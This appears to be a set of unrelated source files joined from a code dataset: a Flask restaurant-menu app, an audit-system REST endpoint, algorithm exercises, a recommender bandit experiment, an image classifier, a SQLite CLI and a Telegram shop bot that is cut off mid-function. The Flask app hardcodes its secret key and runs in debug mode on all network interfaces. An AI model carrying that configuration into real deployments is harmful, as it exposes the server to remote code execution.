MenuItem\n\napp = Flask(__name__)\n\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n# Making an API Endpoint (GET Request)\n@app.route('/restaurants/<int:restaurant_id>/menu/JSON')\ndef restaurantMenuJSON(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(\n id=restaurant_id).one()\n items = session.query(MenuItem).filter_by(\n restaurant_id=restaurant_id).all()\n return jsonify(MenuItems=[i.serialize for i in items])\n\n@app.route('/restaurants/<int:restaurant_id>/menu/<int:menu_id>/JSON/')\ndef restaurantMenuItemJSON(restaurant_id, menu_id):\n menuItem = session.query(MenuItem).filter_by(id = menu_id).one()\n return jsonify(menuItem.serialize)\n\n\n@app.route('/')\ndef homePage():\n restaurants = session.query(Restaurant).all()\n output =''\n output = '<ul>'\n for restaurant in restaurants:\n output += '<li>'\n output += '<a href=\"/restaurants/%s/\">' %restaurant.id \n output += restaurant.name\n output += '</a>'\n output += '</li>'\n output += '</ul>'\n return output\n\n@app.route('/restaurants/<int:restaurant_id>/')\ndef restaurantMenu(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n items = session.query(MenuItem).filter_by(restaurant_id = restaurant_id)\n return render_template('menu.html', restaurant=restaurant, items=items)\n\n# Create functions to newMenuItem, editMenuItem and deleteMenuItem...\n\n@app.route('/restaurant/<int:restaurant_id>/add', methods=['GET', 'POST'])\ndef newMenuItem(restaurant_id):\n if request.method == 'POST':\n newItem = MenuItem(name = request.form['name'], restaurant_id = restaurant_id)\n session.add(newItem)\n session.commit()\n flash('new menu item created!')\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('newmenuitem.html', restaurant_id = restaurant_id)\n \n@app.route('/restaurant/<int:restaurant_id>/<int:menu_id>/edit', methods=['GET', 'POST'])\ndef editMenuItem(restaurant_id, menu_id):\n editedItem = session.query(MenuItem).filter_by(id=menu_id).one()\n if request.method == 'POST':\n if request.form['name']:\n editedItem.name = request.form['name']\n session.add(editedItem)\n session.commit()\n flash('The item has been edited!')\n return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template(\n 'editmenuitem.html', restaurant_id=restaurant_id, menu_id=menu_id, item=editedItem)\n\n\n@app.route('/restaurant/<int:restaurant_id>/<int:menu_id>/delete', methods=['GET', 'POST'])\ndef deleteMenuItem(restaurant_id, menu_id):\n menuItem = session.query(MenuItem).filter_by(id = menu_id).one()\n if request.method == 'POST':\n session.delete(menuItem)\n session.commit()\n flash('Say goodbye to your little friend!')\n return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template(\n 'deletemenuitem.html', restaurant_id=restaurant_id, menu_id=menu_id, item=menuItem)\n\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key' # Flask uses this to create sessions\n app.debug = True\n app.run(host = '0.0.0.0', port = 5000)","sub_path":"source/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"13064445","text":"# -*- coding: utf-8 -*-\n__author__ = \"taw\"\n\nimport commands\n\nfrom flaskext.AuthManager.authmanager import get_current_user_cli\nfrom flaskext.tawrestful import Resource\nfrom pycli.utils.timer import normal_time, uptime_str\nfrom .. import api\n\n# 产品名称:产品型号\nPRODUCT_NAME_TO_MODEL = {\"TA_NET\":\"天融信网络审计系统\", \"TA_DB\":\"天融信数据库审计系统\"}\n#匹配条件\nMATCHING_PATTERN1 = \"TA_NET=enable\"\nMATCHING_PATTERN2 = \"TA_DB=enable\"\n\nclass SystemInfo(Resource):\n def __init__(self):\n self.cli = get_current_user_cli()\n\n def get(self):\n system_info = {\n \"license\":self.cli(\"system license version\"),\n \"devname\":self.cli(\"system devname show\"),\n \"timout\":self.cli(\"system webui show\"),\n \"sn\":self.cli(\"system product sn\")\n }\n\n ret = {}\n\n for cmd_k, cmd_v in system_info.iteritems():\n if cmd_v and \"code\" in cmd_v and cmd_v[\"code\"] != \"200\":\n return {\"success\":False, \"msg\":\"Cli(%s) show cmd error:%s\" % (cmd_k, cmd_v)}\n\n ret.update(cmd_v)\n\n system_license = self.cli(\"system license show\")\n if system_license:\n if MATCHING_PATTERN1 in system_license.get(\"license_info\").split(\"\\n\"):\n pattern_name = MATCHING_PATTERN1.split(\"=\")[0]\n ret[\"model\"] = pattern_name.replace(\"_NET\", \"-Net\")\n ret[\"name\"] = PRODUCT_NAME_TO_MODEL[pattern_name]\n\n elif MATCHING_PATTERN2 in system_license.get(\"license_info\").split(\"\\n\"):\n pattern_name = MATCHING_PATTERN2.split(\"=\")[0]\n ret[\"model\"] = pattern_name.replace(\"_NET\", \"-Net\")\n ret[\"name\"] = PRODUCT_NAME_TO_MODEL[pattern_name]\n\n else:\n pattern_name = MATCHING_PATTERN1.split(\"=\")[0]\n ret[\"model\"] = pattern_name.replace(\"_NET\", \"-Net\")\n ret[\"name\"] = PRODUCT_NAME_TO_MODEL[pattern_name]\n\n ret[\"version\"] = \"V3\"\n\n return ret, 200\n\n# 系统时间与系统运行时间相关接口\nclass SystemUptime(Resource):\n def get(self):\n timezone = commands.getoutput(\"date | awk '{print $5}'\")\n normaltime = normal_time()\n\n systime = timezone + \" \" + normaltime\n uptime = uptime_str()\n\n ret = {}\n ret[\"systime\"] = systime\n ret[\"uptime\"] = uptime\n\n return ret, 200\n\napi.add_resource(SystemInfo, \"/systemmanage/system_setting/systeminfo\")\napi.add_resource(SystemUptime, \"/systemmanage/system_setting/systemuptime\")\n","sub_path":"modules/api/restful/systemmanage/system_setting/systeminfo.py","file_name":"systeminfo.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"337738886","text":"def longest_palindromic_substring(s): # banana\r\n\tif len(s) == 0: return s\r\n\r\n\tlength = len(s) # 6\r\n\tmid = 0\r\n\tmax_substring_length = 0\r\n\tfinal_palindrome = \"\"\r\n\r\n\twhile mid < length: # 0 < 6 # 1 < 6 # 2\r\n\t\tcurrent_palindrome = longest_palindrome(s, mid) # b # a\r\n\t\tif len(current_palindrome) > max_substring_length: # 1 > 0\r\n\t\t\tmax_substring_length = len(current_palindrome) # 1\r\n\t\t\tfinal_palindrome = current_palindrome # \"b\"\r\n\t\tmid += 1\r\n\r\n\treturn final_palindrome\r\n\r\ndef longest_palindrome(s, mid): # s, 0 # s, 1, # s, 2\r\n\tfinal_palindrome = s[mid] # \"b\" # a # n # ana\r\n\tstart = mid - 1 # -1 # 0 # 1\r\n\tend = mid + 1 # 1 # 2 # 3\r\n\twhile start >= 0 and end < len(s):\r\n\t\tpalindrome = s[start:end+1] # ana\r\n\t\t# if is_palindrome(palindrome): \r\n\t\tif s[start] == s[end]:\r\n\t\t\t# final_palindrome = palindrome # ana\r\n\t\t\tfinal_palindrome = s[start:end+1]\r\n\t\t\tstart -= 1 # 0\r\n\t\t\tend += 1 # 4\r\n\t\telse:\r\n\t\t\tbreak\r\n\treturn final_palindrome # b # a \r\n\r\n# def is_palindrome(s):\r\n# \ti, j = 0, len(s) - 1\r\n# \twhile i < j:\r\n# \t\tif s[i] != s[j]:\r\n# \t\t\treturn False\r\n# \t\ti+=1\r\n# \t\tj-=1\r\n# \treturn True\r\n\t\t\r\nprint(longest_palindromic_substring(\"banana\"))\r\n\r\n# solve it using dynamic programming","sub_path":"leetcode3_longestPalindromicSubstring.py","file_name":"leetcode3_longestPalindromicSubstring.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"201854140","text":"import numpy as np \r\nimport networkx as nx\r\nimport seaborn as sns\r\nsns.set_style(\"white\")\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics.pairwise import rbf_kernel\r\nfrom sklearn.preprocessing import Normalizer, MinMaxScaler\r\nfrom scipy.sparse import csgraph \r\nimport scipy\r\nimport os \r\nos.chdir('/Kaige_Research/Code/graph_bandit/code/')\r\nfrom sklearn import datasets\r\nfrom linucb import LINUCB\r\nfrom gob import GOB \r\nfrom colin import COLIN\r\nfrom lapucb import LAPUCB\r\nfrom lapucb_sim import LAPUCB_SIM\r\nfrom sclub import SCLUB\r\nfrom club import CLUB\r\nfrom utils import *\r\nfrom sklearn.decomposition import NMF\r\nfrom Recommender.matrix_factor_model import ProductRecommender\r\ninput_path='../processed_data/delicious/'\r\npath='../bandit_results/delicious/'\r\n\r\nuser_feature_matrix=np.load(input_path+'binary_payoff_user_feature_matrix_100.npy')\r\nitem_feature_matrix=np.load(input_path+'binary_payoff_item_feature_matrix_500.npy')\r\nrating_matrix=np.load(input_path+'binary_rating_matrix_100_user_500_bookmark.npy')\r\nrating_matrix_mask=np.load(input_path+'binary_rating_mask_100_user_500_bookmark.npy')\r\nuser_num=30\r\nuser_feature_matrix=user_feature_matrix[:user_num]\r\ntrue_payoffs=np.dot(user_feature_matrix, item_feature_matrix.T)\r\n\r\n# true_rating=rating_matrix[:user_num]\r\n# mask=rating_matrix_mask[:user_num]\r\n# true_rating_matrix=true_rating*mask\r\n# true_payoffs=true_payoffs*(1-mask)\r\n# true_payoffs=true_payoffs+true_rating_matrix\r\ntrue_payoffs[true_payoffs>=0.5]=1.0\r\ntrue_payoffs[true_payoffs<0.5]=0.0\r\n# a=true_payoffs.ravel()\r\n# plt.plot(a, '.')\r\n# plt.show()\r\n\r\ndimension=item_feature_matrix.shape[1]\r\nitem_num=item_feature_matrix.shape[0]\r\npool_size=10\r\niteration=3000\r\nsigma=0.1# noise\r\ndelta=0.01# high probability\r\nalpha=1# regularizer\r\nalpha_2=0.01# edge delete CLUB\r\nbeta=0.1 # exploration for CLUB, SCLUB and GOB\r\nthres=0.0\r\nk=3 # edge number each node SCLUb to control the sparsity\r\nstate=True\r\nloop=1\r\n\r\ntrue_adj=rbf_kernel(user_feature_matrix, gamma=0.5)\r\nnoise_matrix=np.zeros((user_num, item_num))\r\nuser_seq=np.random.choice(range(user_num), size=iteration)\r\nitem_pool_seq=np.random.choice(range(item_num), size=(iteration, pool_size))\r\n\r\nlinucb_regret_matrix=np.zeros((loop, iteration))\r\nlinucb_error_matrix=np.zeros((loop, iteration))\r\ngob_regret_matrix=np.zeros((loop, iteration))\r\ngob_error_matrix=np.zeros((loop, iteration))\r\nlapucb_regret_matrix=np.zeros((loop, iteration))\r\nlapucb_error_matrix=np.zeros((loop, iteration))\r\nlapucb_sim_regret_matrix=np.zeros((loop, iteration))\r\nlapucb_sim_error_matrix=np.zeros((loop, iteration))\r\nclub_regret_matrix=np.zeros((loop, iteration))\r\nclub_error_matrix=np.zeros((loop, iteration))\r\ngob_graph_matrix=np.zeros((loop, iteration))\r\nlapucb_graph_matrix=np.zeros((loop, iteration))\r\nlapucb_sim_graph_matrix=np.zeros((loop, iteration))\r\n\r\n\r\nfor l in range(loop):\r\n\tlinucb_model=LINUCB(dimension, user_num, item_num, pool_size, item_feature_matrix, user_feature_matrix, true_payoffs, alpha, delta, sigma, state)\r\n\tgob_model=GOB(dimension, user_num, item_num, pool_size, item_feature_matrix, user_feature_matrix, true_payoffs,true_adj, alpha, delta, sigma, beta, state)\r\n\tlapucb_model=LAPUCB(dimension, user_num, item_num, pool_size, item_feature_matrix, user_feature_matrix, true_payoffs,true_adj, noise_matrix, alpha, delta, sigma, beta, thres, state)\r\n\tlapucb_sim_model=LAPUCB_SIM(dimension, user_num, item_num, pool_size, item_feature_matrix, user_feature_matrix, true_payoffs,true_adj, noise_matrix, alpha, delta, sigma, beta, thres, state)\r\n\tclub_model = CLUB(dimension, user_num, item_num, pool_size, item_feature_matrix, user_feature_matrix, true_payoffs, alpha, alpha_2, delta, sigma, beta, state)\r\n\r\n\tlinucb_regret, linucb_error, linucb_beta=linucb_model.run(user_seq, item_pool_seq, iteration)\r\n\tgob_regret, gob_error, gob_beta, gob_graph=gob_model.run(user_seq, item_pool_seq, iteration)\r\n\tlapucb_regret, lapucb_error, lapucb_beta, lapucb_graph=lapucb_model.run(user_seq, item_pool_seq, iteration)\r\n\tlapucb_sim_regret, lapucb_sim_error, lapucb_sim_beta, lapucb_sim_graph=lapucb_sim_model.run(user_seq, item_pool_seq, iteration)\r\n\tclub_regret, club_error, club_cluster_num, club_beta=club_model.run(user_seq, item_pool_seq, iteration)\r\n\r\n\tlinucb_regret_matrix[l], linucb_error_matrix[l]=linucb_regret, linucb_error\r\n\tgob_regret_matrix[l], gob_error_matrix[l], gob_graph_matrix[l]=gob_regret, gob_error, gob_graph\r\n\tlapucb_regret_matrix[l], lapucb_error_matrix[l], lapucb_graph_matrix[l]=lapucb_regret, lapucb_error, lapucb_graph\r\n\tlapucb_sim_regret_matrix[l], lapucb_sim_error_matrix[l], lapucb_sim_graph_matrix[l]=lapucb_sim_regret, lapucb_sim_error, lapucb_sim_graph\r\n\tclub_regret_matrix[l], club_error_matrix[l]=club_regret, club_error\r\n\r\n\r\n\tlinucb_regret=np.mean(linucb_regret_matrix, axis=0)\r\n\tlinucb_error=np.mean(linucb_error_matrix, axis=0)\r\n\r\n\tgob_regret=np.mean(gob_regret_matrix, axis=0)\r\n\tgob_error=np.mean(gob_error_matrix, axis=0)\r\n\tgob_graph=np.mean(gob_graph_matrix, axis=0)\r\n\r\n\tlapucb_regret=np.mean(lapucb_regret_matrix, axis=0)\r\n\tlapucb_error=np.mean(lapucb_error_matrix, axis=0)\r\n\tlapucb_graph=np.mean(lapucb_graph_matrix, axis=0)\r\n\r\n\tlapucb_sim_regret=np.mean(lapucb_sim_regret_matrix, axis=0)\r\n\tlapucb_sim_error=np.mean(lapucb_sim_error_matrix, axis=0)\r\n\tlapucb_sim_graph=np.mean(lapucb_sim_graph_matrix, axis=0)\r\n\tclub_regret=np.mean(club_regret_matrix, axis=0)\r\n\tclub_error=np.mean(club_error_matrix, axis=0)\r\n\r\n\r\nplt.figure(figsize=(5,5))\r\nplt.plot(linucb_regret,'-.', label='LinUCB')\r\nplt.plot(gob_regret, label='GOB', color='orange')\r\nplt.plot(lapucb_regret, '-*', markevery=0.1, label='G-UCB')\r\nplt.plot(lapucb_sim_regret, '-s', markevery=0.1, label='G-UCB SIM')\r\nplt.plot(club_regret, label='CLUB')\r\nplt.ylabel('Cumulative Regret', fontsize=12)\r\nplt.xlabel('Time', fontsize=12)\r\nplt.legend(loc=2, fontsize=10)\r\nplt.tight_layout()\r\nplt.savefig(path+'regret_delicious_user_num_%s_item_num_%s'%(user_num, item_num)+'.png', dpi=300)\r\nplt.savefig(path+'regret_delicious_user_num_%s_item_num_%s'%(user_num, item_num)+'.eps', dpi=300)\r\nplt.show()\r\n\r\n\r\nplt.figure(figsize=(5,5))\r\nplt.plot(linucb_error,'-.', label='LinUCB')\r\nplt.plot(gob_error, label='GOB')\r\nplt.plot(lapucb_error, '-*', markevery=0.1, label='G-UCB')\r\nplt.plot(lapucb_sim_error, '-s', markevery=0.1, label='G-UCB SIM')\r\nplt.plot(club_error, label='CLUB')\r\nplt.ylabel('Error', fontsize=12)\r\nplt.xlabel('Time', fontsize=12)\r\nplt.legend(loc=1, fontsize=10)\r\nplt.tight_layout()\r\nplt.savefig(path+'error_delicious_user_num_%s_item_num_%s'%(user_num, item_num)+'.png', dpi=300)\r\nplt.savefig(path+'error_delicious_user_num_%s_item_num_%s'%(user_num, item_num)+'.eps', dpi=300)\r\nplt.show()\r\n\r\n\r\n","sub_path":"bandit_implement_delicious.py","file_name":"bandit_implement_delicious.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"624051362","text":"num = int(input('Enter the number : '))\r\na=0\r\nz=1\r\nx=0\r\nprint( a ,\"\\n\", z )\r\nfor i in range(num-2):\r\n x = a + z\r\n a = z\r\n z = x\r\n print(x)","sub_path":"fibbonnaci.py","file_name":"fibbonnaci.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"110691931","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 11 01:16:28 2016\n\n@author: Wil\n\"\"\"\nimport cv2\nimport numpy as np\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimage_paths = []\npath = \"Sorted/\"\n\n#list of our class names\ntraining_names = os.listdir(path)\n\ntraining_paths = []\nnames_path = []\n#get full list of all training images\nfor p in training_names:\n training_paths1 = os.listdir(path+p)\n for j in training_paths1:\n training_paths.append(path+p+\"/\"+j)\n names_path.append(p)\n\nsift = cv2.SIFT()\ndescriptors_unclustered = []\ndictionarySize = 5\nBOW = cv2.BOWKMeansTrainer(dictionarySize)\n\nfor p in training_paths:\n image = cv2.imread(p)\n gray = cv2.cvtColor(image, cv2.CV_LOAD_IMAGE_GRAYSCALE)\n kp, dsc= sift.detectAndCompute(gray, None)\n BOW.add(dsc)\n\n#dictionary created\ndictionary = BOW.cluster()\n\n\nFLANN_INDEX_KDTREE = 0\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks=50) # or pass empty dictionary\nflann = cv2.FlannBasedMatcher(index_params,search_params)\nsift2 = cv2.DescriptorExtractor_create(\"SIFT\")\nbowDiction = cv2.BOWImgDescriptorExtractor(sift2, cv2.BFMatcher(cv2.NORM_L2))\nbowDiction.setVocabulary(dictionary)\n\ntrain_desc = []\ntrain_labels = []\ni = 0\nfor p in training_paths:\n img = cv2.imread(p, 1)\n gray = cv2.cvtColor(img, cv2.CV_LOAD_IMAGE_GRAYSCALE)\n feature = bowDiction.compute(gray, sift.detect(gray))\n train_desc.extend(feature)\n if names_path[i]=='Liberty':\n train_labels.append(1)\n if names_path[i]=='Lincoln':\n train_labels.append(2)\n if names_path[i]=='Monument':\n train_labels.append(3)\n if names_path[i]=='Pisa':\n train_labels.append(4)\n i = i+1\n\nprint(\"svm items\", len(train_desc), len(train_desc[0]))\ncount=0\nsvm = cv2.SVM()\nsvm.train(np.array(train_desc), np.array(train_labels))\n\nactual=[]\npredicted=[]\ndef classify(fil):\n img = cv2.imread(fil, 1)\n gray = cv2.cvtColor(img, cv2.CV_LOAD_IMAGE_GRAYSCALE)\n feature = bowDiction.compute(gray, sift.detect(gray))\n p = svm.predict(feature)\n predicted.append(int(p))\n actual.append(train_labels[count])\n \n \n\nfor p in training_paths:\n classify(p)\n count+=1\n\ny_actu = pd.Series(actual, name='Actual')\ny_pred = pd.Series(predicted, name='Predicted')\ndf_confusion = pd.crosstab(y_actu, y_pred, rownames=['Actual'], colnames=['Predicted'], margins=True)\ndf_conf_norm = df_confusion / df_confusion.sum(axis=1)\n\ndef plot_confusion_matrix(df_confusion, title='Confusion matrix', cmap=plt.cm.gray_r):\n plt.matshow(df_confusion, cmap=cmap) # imshow\n #plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(df_confusion.columns))\n plt.xticks(tick_marks, df_confusion.columns, rotation=45)\n plt.yticks(tick_marks, df_confusion.index)\n #plt.tight_layout()\n plt.ylabel(df_confusion.index.name)\n plt.xlabel(df_confusion.columns.name)\n\nprint(df_confusion)\nplot_confusion_matrix(df_conf_norm)\n","sub_path":"Presentation.py","file_name":"Presentation.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181062704","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport click\nfrom modelosqlite3 import *\n\nBD = \"biblioteca.sqlite3\"\n\n@click.group()\ndef crud():\n parametros_bd(BD)\n\n@crud.command()\n@click.argument(\"nombre\")\n@click.argument(\"ap-paterno\")\n@click.argument(\"ap-materno\", required=False)\ndef c_autor(nombre, ap_paterno, ap_materno):\n \"\"\" Inserta un registro en la tabla Autor \"\"\"\n # Variables que definen que insertar y en que tabla se insertan\n tabla = \"Autor\"\n valores = (nombre, ap_paterno, ap_materno)\n # Se realiza la inserción del registro\n inserta_registro(tabla, valores)\n\n # Se muestra un mensaje al usuario\n print(\"Se ha insertado el registro {} en la tabla {}\".format(\n valores, tabla))\n\ndef imprime_texto(registros):\n \"\"\" Imprime la lista de registros en la salida estándar en formato texto \"\"\"\n # Se obtiene el ancho máximo de cada columna\n anchos = [[len(str(c)) for c in f] for f in registros]\n anchos = [max(f) for f in zip(*anchos)]\n\n # Se imprime la tabla de resultados\n for fila in registros:\n # Se remplaza los campos vaciós por cademas vacías.\n fila = [c if c != None else \"\" for c in fila]\n # A cada campo se agrega el valor del ancho\n fila = tuple(zip(fila, anchos))\n # A cada campo se le dá formato\n fila = [\"{:{}}\".format(*c) for c in fila]\n # Se fusionan los campos en una cadena y se imprimen\n print(\" | \".join(fila))\n\n@crud.command()\ndef r_autor():\n \"\"\" Imprime la lista de registros de la tabla Autor \"\"\"\n # Se obtiene la lista de registros de la tabla Autor\n registros = obtiene_registros(\"Autor\")\n # Se imprimen los registros en formato texto en la salida estándar\n imprime_texto(registros)\n\n@crud.command()\n@click.argument(\"id\")\n@click.argument(\"campo\")\n@click.argument(\"valor\")\ndef u_autor(id, campo, valor):\n \"\"\" Actualiza los datos de un Autor \"\"\"\n # Variables necesarias para actualizar un campo en un registro\n tabla = \"Autor\"\n valores = (valor, id)\n actualiza_registro(tabla, campo, valores)\n\n # Se muestra un mensaje al usuario\n print(\"Se ha actualizado el registro {} en la tabla {}\".format(id, tabla))\n\n@crud.command()\n@click.argument(\"id\")\ndef d_autor(id):\n \"\"\" Elimina un registro de un Autor \"\"\"\n # Variables necesarias para eliminar un campo en un registro\n tabla = \"Autor\"\n valores = (id,)\n elimina_registro(tabla, valores)\n\n # Se muestra un mensaje al usuario\n print(\"Se ha eliminado el registro {} en la tabla {}\".format(id, tabla))\n\n\nif __name__ == '__main__':\n crud()\n","sub_path":"Clase-05/Ejemplo-05/biblioteca-crud.py","file_name":"biblioteca-crud.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"142288074","text":"import json\n\nfrom mongoengine import NotUniqueError, DoesNotExist\nfrom telebot import TeleBot\nfrom telebot.types import ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardMarkup, InlineKeyboardButton, Update\nfrom flask import Flask, request, abort\n\nfrom My_tg_bot.shop_models import *\nfrom My_tg_bot.utils import inline_kb_from_iterable\nfrom My_tg_bot.constants import *\nfrom My_tg_bot.extra_models import News_hot\nfrom My_tg_bot.config import TOKEN, URI\n\nbot = TeleBot(TOKEN)\napp = Flask(__name__)\n\n\n@app.route(URI, methods=['POST'])\ndef handle_webhook():\n if request.headers.get('content-type') == 'application/json':\n json_string = request.get_data().decode('utf-8')\n update = Update.de_json(json_string)\n bot.process_new_updates([update])\n return ''\n abort(403)\n\n\n@bot.message_handler(commands=['start'])\ndef handle_start(message):\n try:\n User.objects.create(\n telegram_id=message.chat.id,\n username=getattr(message.from_user, 'username', None),\n first_name=getattr(message.from_user, 'first_name', None)\n )\n except NotUniqueError:\n greetings = GREETINGS_1\n else:\n name = f', {message.from_user.first_name}' if getattr(message.from_user, 'first_name') else ''\n greetings = GREETINGS.format(name)\n kb = ReplyKeyboardMarkup(resize_keyboard=True)\n buttons = [KeyboardButton(n) for n in START_KB.values()]\n kb.add(*buttons)\n bot.send_message(message.chat.id, greetings, reply_markup=kb)\n\n\n@bot.message_handler(func=lambda m: START_KB[CATEGORIES] == m.text)\ndef handle_categories(message):\n root_categories = Category.get_root_categories()\n kb = inline_kb_from_iterable(CATEGORY_TAG, root_categories)\n bot.send_message(message.chat.id, CHOOSE_CATEGORY, reply_markup=kb)\n\n\n@bot.callback_query_handler(lambda c: json.loads(c.data)['tag'] == CATEGORY_TAG)\ndef handle_category_click(call):\n category = Category.objects.get(id=json.loads(call.data)['id'])\n if category.subcategories:\n kb = inline_kb_from_iterable(CATEGORY_TAG, category.subcategories)\n bot.edit_message_text(category.title, chat_id=call.message.chat.id, message_id=call.message.id,\n reply_markup=kb)\n else:\n products = category.get_products()\n for p in products:\n kb = InlineKeyboardMarkup()\n button = InlineKeyboardButton(text=ADD_TO_CART, callback_data=json.dumps({\n 'id': str(p.id),\n 'tag': PRODUCT_TAG\n }))\n kb.add(button)\n description = p.description if p.description else ''\n bot.send_photo(call.message.chat.id, p.image.read(),\n caption=f'{p.title}\\n{description}\\nЦіна на даний товар - {p.price} грн'\n f'\\nЦіна на товар враховуючи знижку - {p.real_discount()} грн', reply_markup=kb)\n\n\n@bot.message_handler(func=lambda m: START_KB[PRODUCTS_WITH_DISCOUNT] == m.text)\ndef discounts(message):\n products = Product.objects(discount__ne=0)\n bot.send_message(message.chat.id, PRODUCTS_DIS)\n for i in products:\n bot.send_message(message.chat.id, f'{i.title} - {i.discount}%\\n')\n\n\n@bot.message_handler(func=lambda m: START_KB[NEWS] == m.text)\ndef handle_categories(message):\n count_news = News_hot.objects().count()\n your_news = News_hot.objects[count_news-3:count_news]\n bot.send_message(message.chat.id, HOT_NEWS)\n for n in your_news:\n bot.send_message(message.chat.id, f\"{n.body}\")\n\n\n@bot.callback_query_handler(lambda c: json.loads(c.data)['tag'] == PRODUCT_TAG)\ndef handle_category_click(call):\n product = Product.objects.get(id=json.loads(call.data)['id'])\n try:\n Cart.objects.create(user_telegram_id=call.from_user.id)\n cart = Cart.objects.get(user_telegram_id=call.from_user.id)\n cart.add_product(product)\n except NotUniqueError:\n cart = Cart.objects.get(user_telegram_id=call.from_user.id)\n cart.add_product(product)\n bot.send_message(call.message.chat.id, f'Товар - {product.title}, було додано в корзину')\n\n\n@bot.message_handler(func=lambda m: START_KB[CART] == m.text)\ndef your_settings(message):\n try:\n cart = Cart.objects.get(user_telegram_id=message.from_user.id)\n list_1 = []\n if cart.products == list_1:\n bot.send_message(message.chat.id, SORRY_CART)\n else:\n bot.send_message(message.chat.id, CART_PRODUCT)\n kb_1 = ReplyKeyboardMarkup(resize_keyboard=True)\n buttons = [KeyboardButton(n) for n in CART_KB.values()]\n kb_1.add(*buttons)\n for i in cart.products:\n kb = InlineKeyboardMarkup()\n button = InlineKeyboardButton(text='Видалити з корзини', callback_data=json.dumps({\n 'id': str(i.id),\n 'tag': CART_TAG\n }))\n kb.add(button)\n bot.send_message(message.chat.id, i.title, reply_markup=kb)\n bot.send_message(message.chat.id, THANKS, reply_markup=kb_1)\n except DoesNotExist:\n bot.send_message(message.chat.id, SORRY_CART)\n\n\n@bot.callback_query_handler(lambda c: json.loads(c.data)['tag'] == CART_TAG)\ndef deletion_cart(call):\n cart = Cart.objects.get(user_telegram_id=call.from_user.id)\n product = Product.objects.get(id=json.loads(call.data)['id'])\n list_1 = []\n for i in cart.products:\n list_1.append(i)\n index_1 = cart.products.index(product)\n del list_1[index_1]\n cart.update(products=list_1)\n bot.send_message(call.message.chat.id, f'Товар - {product.title} було видалено з корзини')\n\n\n@bot.message_handler(func=lambda m: START_KB[SETTINGS] == m.text)\ndef your_settings(message):\n user = User.objects.get(telegram_id=message.chat.id)\n data = user.formatted_data()\n kb = ReplyKeyboardMarkup(resize_keyboard=True)\n buttons = [KeyboardButton(n) for n in SETTINGS_KB.values()]\n kb.add(*buttons)\n bot.send_message(message.chat.id, PARAMETERS.format(data), reply_markup=kb)\n\n\n@bot.message_handler(func=lambda m: SETTINGS_KB[NICK] == m.text)\ndef nick_change(message):\n bot.send_message(message.chat.id, YOUR_NICK)\n\n\n@bot.message_handler(func=lambda m: SETTINGS_KB[NAME] == m.text)\ndef nick_change(message):\n bot.send_message(message.chat.id, YOUR_NAME)\n\n\n@bot.message_handler(func=lambda m: SETTINGS_KB[EMAIL] == m.text)\ndef nick_change(message):\n bot.send_message(message.chat.id, YOUR_EMAIL)\n\n\n@bot.message_handler(func=lambda m: SETTINGS_KB[NUMBER] == m.text)\ndef nick_change(message):\n bot.send_message(message.chat.id, YOUR_NUM)\n\n\n@bot.message_handler(content_types=['text'])\ndef understanding(message):\n if 'Новий нікнейм:' in message.text:\n new_nick = message.text[14::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.update(username=new_nick)\n bot.send_message(message.chat.id, f'{new_nick} - Ваш новий нікнейм, його було збережено')\n elif 'Новий нейм:' in message.text:\n new_name = message.text[11::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.update(first_name=new_name)\n bot.send_message(message.chat.id, f\"{new_name} - Ваше нове ім'я, його було збережено\")\n elif 'Новий емейл:' in message.text:\n new_email = message.text[12::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.update(email=new_email)\n bot.send_message(message.chat.id, f\"{new_email} - Ваш новий емейл, його було збережено\")\n elif 'Новий номер:' in message.text:\n new_number = message.text[12::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.update(phone_number=new_number)\n bot.send_message(message.chat.id, f\"{new_number} - Ваш новий номер телефону, його було збережено\")\n elif 'Сума всіх товарів корзини' == message.text:\n cart = Cart.objects.get(user_telegram_id=message.from_user.id)\n list_1 = []\n c = 1\n for i in cart.products:\n bot.send_message(message.chat.id, f'Ціна {c} обраного товару - {i.real_discount()} грн\\n ')\n list_1.append(i.real_discount())\n c += 1\n bot.send_message(message.chat.id, f'Всього маємо: {sum(list_1)} грн')\n elif 'Оформити замовлення' == message.text:\n bot.send_message(message.chat.id, NUM_ORDER)\n elif 'Мій номер:' in message.text:\n new_number = message.text[9::]\n user = User.objects.get(telegram_id=message.chat.id)\n user.update(phone_number=new_number)\n bot.send_message(message.chat.id, ADDRESS_ORDER)\n elif 'Моя адреса:' in message.text:\n new_address = message.text[11::]\n 